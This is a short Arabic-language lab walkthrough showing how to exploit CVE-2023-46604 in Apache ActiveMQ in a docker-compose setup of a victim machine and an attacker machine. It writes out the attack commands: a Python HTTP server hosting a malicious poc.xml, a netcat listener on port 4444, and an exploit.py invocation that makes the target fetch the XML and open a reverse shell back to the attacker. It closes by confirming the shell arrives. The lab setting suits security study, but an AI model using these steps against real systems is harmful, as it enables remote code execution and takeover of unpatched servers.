
استغلال لثغرة CVE-2023-46604 في Apache ActiveMQ، يتيح تنفيذ الأكواد عن بُعد عبر حمولات XML مصممة خصيصًا وإنشاء قشرة عكسية.
CVE-2023-46604

قم ببناء docker-compose يحتوي على صورتين: جهاز الضحية والجهاز الهدف وفقًا للبيئة المطلوبة. على جهاز الضحية، قم بتشغيل ActiveMQ.
انتقل إلى جهاز المهاجم: • افتح خدمة HTTP لإرسال الـ PoC: python3 -m http.server
• استخدم netcat للاستماع إلى الاتصالات الواردة إلى جهاز المهاجم: nc -nlvp 4444
• أرسل الحمولة لإنشاء اتصال reverse shell بجهاز المهاجم: python3 exploit.py -i 172.18.0.3 -p 61616 --xml http://172.18.0.2:8000/poc.xml حيث:
يمكن ملاحظة أنه بعد تنفيذ الأمر الخاص بتشغيل ملف exploit.py، يرسل كود الاستغلال حزمة poc.xml عبر خادم الويب إلى الهدف وهو عنوان خدمة ActiveMQ التي تعمل على الخادم الهدف. وفي نفس الوقت، يتلقى خادم HTTP على جهاز المهاجم طلبًا مرسلًا من عنوان IP الخاص بجهاز الهدف.
بعد إرسال الحمولة، انتقل إلى الطرفية التي تستمع على المنفذ 4444 على جهاز المهاجم. نلاحظ أن reverse shell الخاص بجهاز الضحية قد تم إرساله.